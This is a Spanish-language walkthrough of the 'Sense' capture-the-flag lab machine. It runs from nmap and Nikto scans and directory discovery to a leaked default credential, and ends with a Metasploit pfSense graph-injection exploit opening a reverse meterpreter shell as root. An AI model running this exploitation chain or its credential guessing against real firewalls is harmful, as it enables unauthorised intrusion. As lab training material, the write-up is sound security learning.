Como siempre empezamos con el discovery
Primero Sense es un firewall así que podemos asumir que para hayá irán los tiros.
Nmap nos dice que esta abierto el puerto 80 y el 433
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:04 CET Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 15.94% done; ETC: 11:07 (0:02:17 remaining) Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 68.66% done; ETC: 11:06 (0:00:41 remaining) Nmap scan report for 10.10.10.60 Host is up (0.017s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Did not follow redirect to https://10.10.10.60/ 443/tcp open ssl/https? |_ssl-date: TLS randomness does not represent time Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 223.48 seconds
Sparta nos dice lo mismo pero como siempre nos da mas información.
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.60 + Target Hostname: 10.10.10.60 + Target Port: 443 --------------------------------------------------------------------------- + SSL Info: Subject: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address Ciphers: AES256-SHA Issuer: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address + Start Time: 2019-03-27 11:06:06 (GMT1) --------------------------------------------------------------------------- + Server: lighttpd/1.4.35 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Cookie cookie_test created without the secure flag + Cookie cookie_test created without the httponly flag + No CGI Directories found (use '-C all' to force check all possible dirs) + Multiple index files found: /index.html, /index.php + Hostname '10.10.10.60' does not match certificate's names: Common + OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3092: /tree/: This might be interesting... + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found. + /help.php: A help file was found. + 7500 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2019-03-27 11:14:51 (GMT1) (525 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Particularmente interesante es shellshock, los dos index y los otros lugares de php. Lanzaremos dirbuster con php y txt para ver que otras cosas descurbrimos. Hay que acordarnos de quitarle lo recursive sino se hará eterno.
Hay dos archivos en dirbuster
- changelog.txt
- system_users.txt
####Support ticket### Please create the following user username: Rohit password: company defaults
ciertamente hay que adivinar un poco porque el verdadero username es “rohit” pero bueno con “rohit:pfsense”
Metasploit
A partir de aquí es muy sencilo.
msf5 exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_e xec msf5 exploit(unix/http/pfsense_graph_injection_exec) > show options Module options (exploit/unix/http/pfsense_graph_injection_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD pfsense yes Password to login with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.60 yes The target address range or CIDR identifier RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections USERNAME rohit yes User to login with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.14.91 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target msf5 exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 10.10.14.91:4444 [*] Detected pfSense 2.1.3-RELEASE, uploading intial payload [*] Payload uploaded successfully, executing [*] Sending stage (38247 bytes) to 10.10.10.60 [*] Meterpreter session 3 opened (10.10.14.91:4444 -> 10.10.10.60:39599) at 2019-03-27 12:46:20 +0100 [!] Tried to delete HgyHu, unknown result meterpreter > lpwd /root meterpreter > ps Process List ============ PID Name User Path --- ---- ---- ---- 0 meterpreter > getuid Server username: root (0) meterpreter >
Y ya eres root, con eso puedes cat los dos archivos.